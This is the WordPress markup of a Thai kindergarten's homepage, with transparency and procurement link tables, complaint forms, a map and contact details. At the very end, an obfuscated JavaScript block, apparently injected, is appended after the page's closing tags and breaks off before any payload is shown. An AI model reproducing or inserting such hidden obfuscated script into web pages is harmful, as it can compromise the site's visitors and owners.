gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 